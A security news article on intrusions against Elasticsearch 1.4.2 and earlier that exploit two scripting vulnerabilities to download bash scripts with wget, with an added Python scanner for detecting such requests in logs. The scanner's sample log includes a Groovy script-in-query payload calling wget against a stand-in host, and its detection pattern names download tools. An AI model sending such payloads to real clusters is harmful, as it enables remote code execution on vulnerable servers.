Elasticsearch versions 1.4.2 and earlier vulnerable to malware infections

Two old vulnerabilities were exploited, allegedly by Chinese hackers

The Cisco network security and ethical hacking teams recently detected intrusions in which malicious hackers targeted Elasticsearch clusters, exploiting previously reported vulnerabilities to carry out actions such as malware injection and cryptocurrency mining, reported experts from the International Institute of Cyber Security.

“Hackers are attacking users in versions 1.4.2 and earlier,” the network security experts mentioned, after posting a report of the activity detected by a honeypot.

Given the attack techniques used, experts believe that this group of hackers could be operating from China. The attack exploited two vulnerabilities discovered in 2014 and 2015, which allowed scripts to be passed inside search queries; this gave the hackers OS-level access to the older systems and let them deploy the payload. Elasticsearch 1.4.2 was released at the end of 2014.

“The 2014 vulnerability (CVE-2014-3120) allows attackers to execute arbitrary MVEL expressions, while the 2015 vulnerability (CVE-2015-1427) allows hackers to bypass sandbox environments to run arbitrary shell commands through a complex script,” network security experts mention.

Security teams added: “The first payload delivered invokes wget to download a bash script, while the second uses a confusing JavaScript to invoke bash and download the same script with wget. This is probably an attempt to make the exploit functional on multiple platforms.”
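As an added defensive example, not taken from the Cisco report or this article: a small Python scanner over constructed Elasticsearch access-log lines (the `<ip> <method> <path> <json body>` format is an assumption) that flags search requests carrying an inline script, naming the MVEL or Groovy languages mentioned above, or referencing the download tools the payloads invoked.

```python
import json
import re

# Script languages named in the report: MVEL (CVE-2014-3120) and Groovy (CVE-2015-1427).
RISKY_LANGS = {"mvel", "groovy"}
# Tools the report says the payloads invoked to fetch and run a bash script.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|bash)\b")

def _leaves(node, key=None):
    """Yield (parent_key, string) for every string value nested in parsed JSON."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _leaves(v, k)
    elif isinstance(node, list):
        for v in node:
            yield from _leaves(v, key)
    elif isinstance(node, str):
        yield key, node

def inspect_query(body: str) -> list:
    """Return the reasons a request body looks like script abuse (empty list = nothing found)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []  # not a JSON body; nothing to inspect
    leaves = list(_leaves(doc))
    reasons = []
    # A "script" key alone is suspicious: 1.x defaulted to MVEL/Groovy when "lang" was absent.
    if any(k == "script" for k, _ in leaves):
        reasons.append("inline script in query")
    if any(k == "lang" and v.lower() in RISKY_LANGS for k, v in leaves):
        reasons.append("mvel/groovy script language")
    if any(k == "script" and DOWNLOADER_RE.search(v) for k, v in leaves):
        reasons.append("download tool referenced in script")
    return reasons

def scan_log(lines):
    """Return (ip, path, reasons) for each flagged line of the assumed '<ip> <method> <path> <json>' format."""
    hits = []
    for line in lines:
        ip, _method, path, body = line.split(" ", 3)
        if reasons := inspect_query(body):
            hits.append((ip, path, reasons))
    return hits

# Constructed sample lines (not from the report); only the second carries a script-in-query request.
SAMPLE_LOG = [
    '10.0.0.5 POST /logs/_search {"query":{"match":{"msg":"login"}}}',
    '203.0.113.9 POST /_search {"size":1,"script_fields":{"x":{"lang":"groovy","script":"wget http://example.invalid/a.sh"}}}',
]
```

`scan_log(SAMPLE_LOG)` flags only the second line, with all three reasons; on a real cluster the same check belongs in front of the HTTP port, since dynamic scripting should simply be disabled on these versions.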

A Cisco official reported some of the incidents caused by this attack: “We have encountered cases of denial-of-service (DoS) attacks, cryptocurrency mining, and attempts to integrate compromised systems to botnets.”

Although the experts did not explicitly attribute the attack to Chinese hacker groups, their report noted that the numeric identifier of an account on the Chinese social network QQ appeared in one of the commands executed by one of the attack's payloads.

“We analyzed the public account activity of 952135763 and found several posts related to cybersecurity and exploiting vulnerabilities, although we found nothing related to this particular attack. Although these details could provide information to find the hackers responsible for the attack, we do not yet have enough information to know the attackers,” the experts concluded.